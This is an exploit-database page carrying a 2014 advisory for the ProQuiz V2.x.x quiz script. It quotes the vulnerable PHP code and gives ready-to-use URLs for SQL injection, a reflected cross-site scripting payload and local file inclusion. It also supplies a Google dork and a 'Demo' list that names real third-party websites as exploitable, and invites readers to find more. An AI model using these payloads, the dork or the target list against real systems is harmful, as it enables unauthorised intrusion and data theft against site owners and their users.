0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ProQuiz V2.x.x => Multiple Vulnerabilities
[##########################################################################
# Exploit Title : ProQuiz V2.x.x => Multiple Vulnerabilities
# Google Dork : "Powered by Softon Technologies"
# Date : 15/02/2014
# Exploit Author : JoKeR_StEx
# Vendor Homepage : http://proquiz.softon.org/
# Version : V2.x.x
# Tested on : Windows
# CVE : [~]
###########################################################################
[+] Description :
ProQuize V2.x.x affected by SQL injection and Cross Site Scripting & LFI
The vulnerabilities in parametere username & email in file functions about register
[-] Vulnerable Code :
# Line 610=>634
if(!empty($_GET['username'])){
if($_GET['username']==$_SESSION['UA_DETAILS']['username']){
echo "true";
}else{
if(checkUsernameExists($db,$_GET['username'])){
echo "false";
}else{
echo "true";
}
}
}
if(!empty($_GET['email'])){
if($_GET['email']==$_SESSION['UA_DETAILS']['email']){
echo "true";
}else{
if(checkEmailExists($db,$_GET['email'])){
echo "false";
}else{
echo "true";
}
}
}
The Vulnerability in para username : the coder use function CheckUsernameExists() for get username
for confirm if already exists use var $db from class database in file Database.class.php and para2 $_GET['username']
for get info for confirm
The Same Things With email;
[+] Exploit
Dork: "Powered by Softon Technologies"
1-Sql injection
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?username=[SQli]
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?email=[SQli]
2-Cross Site scripting
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?username=%22%3E%3Cscript%3Ealert%28%27Xss%27%29;%3C/script%3E
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?email=%22%3E%3Cscript%3Ealert%28%27Xss%27%29;%3C/script%3E
3-LFI
About LFI IN THE file admin.php
code :
if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');
}else{
echo getContents($db,'admin_panel');
}
http://127.0.0.1/ProQuiz%20V2.0.1/admin.php?action=getpage&page=[file]
when you include file don't create the type of the file just put the name of the file
because you can only include php file
[+] Demo :
http://webexamiq.com/functions.php?username=[SQLI]or[XSS]
http://webexamiq.com/functions.php?email=[SQLI]or[XSS]
http://energia.com.br/web/quiz/functions.php?username=[SQLI]or[XSS]
http://energia.com.br/web/quiz/functions.php?email=[SQLI]or[XSS]
http://effchurch.org/pquiz/functions.php?username=[SQLI]or[XSS]
You Can Find More Websites Infected In Google ^____^'
^___-' Enjoy ^____^
###################
http://www.th3xploiterz.com/
The Black Devils
Dz Crazy L33ts
###################
###########################Gr33tings################################################################
Gr33t'z to : Assesino04, Shield Dz, Eve Dized , Dr.0ryx & My Familly & All Algerians and My Friends
####################################################################################################
Email : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
Twitter : @JoKeR_StEx
# 0day.today [2024-12-26] #